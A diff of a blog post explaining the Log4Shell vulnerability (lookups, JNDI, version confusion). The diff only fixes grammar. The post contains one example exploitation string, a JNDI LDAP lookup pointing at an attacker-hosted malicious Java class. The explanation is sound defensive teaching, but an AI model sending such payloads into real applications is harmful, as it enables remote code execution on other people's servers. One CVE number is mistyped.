who1s/bd-sorsat/content/posts/2021_log4shell.md

 1. Root cause of the vulnerability is lack of improper input validation (CWE-20).
 Basically user can input any string to the application and if the application is set to log for example requested URIs, the URI will end up to Log4j logger without any sanitation.

 2. The Log4j happens to have lookup feature (yes, it's a feature introduced in version log4j-2.0-beta9), which allows requesting variables from the system running the Log4j component.
-This feature can be called from Log4j using `${variable_here}` You can request for example username on a Linux system by providing string `${env:USER}` to Log4j and it will log the username from environment variable user and the value is the running the application.
+This feature can be called from Log4j using `${variable_here}` You can request for example username on a Linux system by providing string `${env:USER}` to Log4j, and it will log the username from environment variable user and the value is the running the application.

 3. Now we get to the interesting part... :D Java runtime has a [Java Naming and Directory Interface (JNDI)](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface) which can be used to discover and look up data from remote endpoints.
 This feature can be called from Log4j by using the lookup method and adding `jndi` string to the lookup command: `${jndi:method:remoteaddress}`.
-JNDI allows multiple methods for the look up: LDAP, DNS, NIS, NDS, RMI, and CORBA, which means we can use any of these methods to look up more data from a remote endpoint.
+JNDI allows multiple methods for the look-up: LDAP, DNS, NIS, NDS, RMI, and CORBA, which means we can use any of these methods to look up more data from a remote endpoint.
 Oh, and the best thing is that JNDI is not a new attack vector, it was [introduced in BHUSA 2016](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf).

-If we would host our malicious Java class in `example.dfir.fi:4444/legit`, our exploitation string would be `${jndi:ldap:example.dfir.fi:4444/legit}`.
+If we hosted our malicious Java class in `example.dfir.fi:4444/legit`, our exploitation string would be `${jndi:ldap:example.dfir.fi:4444/legit}`.
 Inputting this string to vulnerable application would cause the server to look up and execute our Java class hosted on our server.

 If you are more interested how the vulnerability works, I suggest you to read [this write-up by Paul Ducklin](https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/) of Sophos.

 ## Version confusion and fixing the vulnerability

-First of all, I've seen a lot arguments that "we are not vulnerable as we use Log4j 1.X".
+First of all, I've seen a lot of arguments that "we are not vulnerable as we use Log4j 1.X".
 This is true *when we talk about Log4shell* as Log4j 1.X is not vulnerable to this issue.
 Log4j 1.X however has many other issues, like CVE-2019-178571 in versions 1.2.X.
 CVE-2019-17571 has also [public PoC](https://0xsapra.github.io/website/CVE-2019-17571).

 {{< twitter user="GossiTheDog" id="1469250605826850819" >}}